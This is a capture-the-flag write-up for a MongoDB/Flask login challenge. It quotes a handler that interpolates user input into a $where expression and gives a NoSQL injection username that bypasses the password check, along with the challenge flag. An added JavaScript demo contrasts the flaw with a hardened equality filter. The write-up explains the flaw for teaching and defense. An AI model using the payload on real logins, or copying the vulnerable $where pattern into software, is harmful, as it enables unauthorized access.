Tags: mongodb web nosql 

Writeup starts at 01:45 on the video.
The source code for this challenge is provided. The server is vulnerable to NoSQL injection:
```
@app.route("/", methods=["POST"])
def login():
    if "user" not in request.form:
        return redirect(url_for("main", error="user not provided"))
    if "password" not in request.form:
        return redirect(url_for("main", error="password not provided"))

    try:
        # Vulnerable: both form fields are interpolated into the JavaScript
        # expression that MongoDB evaluates for $where.
        user = db.users.find_one(
            {
                "$where":
                    f"this.user === '{request.form['user']}' && this.password === '{request.form['password']}'"
            }
        )
    # (excerpt ends here; the rest of the handler is not shown in the writeup)
```
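In the `$where` property, user input is interpolated straight into the JavaScript expression that MongoDB evaluates, without any validation or sanitization. This allows us to bypass the login if we use the following as the username: its quote closes the string literal early, and because `&&` binds more tightly than `||`, the resulting expression is true for the `admin` document whatever the password is: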
```
admin' || this.user==='a
```
flag{easier_than_picture_lab_at_least}
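
The following is an added example, not code from the challenge or the original writeup. It models locally, without a database, how the interpolated `$where` string is evaluated against each document, and contrasts it with an equality filter that treats the same input as data. The sample documents and the helper names (`vulnerableWhere`, `findOneWhere`, `safeFilter`, `findOneFilter`, `demo`) are assumptions made for the illustration.

```javascript
// Constructed sample data standing in for the challenge's users collection.
const users = [
  { user: "admin", password: "constructed-admin-secret" },
  { user: "guest", password: "guest" },
];

// Same string interpolation as the handler's f-string.
function vulnerableWhere(user, password) {
  return `this.user === '${user}' && this.password === '${password}'`;
}

// Model of $where: the expression runs as JavaScript with `this` bound to
// each document, and the first document for which it is truthy is returned.
function findOneWhere(docs, expr) {
  const predicate = new Function(`return (${expr});`);
  return docs.find((doc) => Boolean(predicate.call(doc))) || null;
}

// Hardened form: values are compared as data, never parsed as code.
// Non-string values are rejected so an object such as {"$ne": null}
// cannot be passed through as a query operator.
function safeFilter(user, password) {
  if (typeof user !== "string" || typeof password !== "string") {
    throw new TypeError("user and password must be strings");
  }
  return { user, password };
}

// Model of an equality filter: every field must match exactly.
function findOneFilter(docs, filter) {
  const keys = Object.keys(filter);
  return docs.find((doc) => keys.every((k) => doc[k] === filter[k])) || null;
}

function demo() {
  const user = "admin' || this.user==='a"; // username from the writeup
  const password = "wrong";
  const expr = vulnerableWhere(user, password);
  return {
    expr, // shows where the injected quote and || land
    vulnerable: findOneWhere(users, expr),
    hardened: findOneFilter(users, safeFilter(user, password)),
  };
}

console.log(demo());
```

In the Flask handler, the hardened form corresponds to passing a filter document such as `{"user": ..., "password": ...}` to `find_one` instead of a `$where` string.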

Original writeup (https://youtu.be/QKZWyWQSPaw?t=105).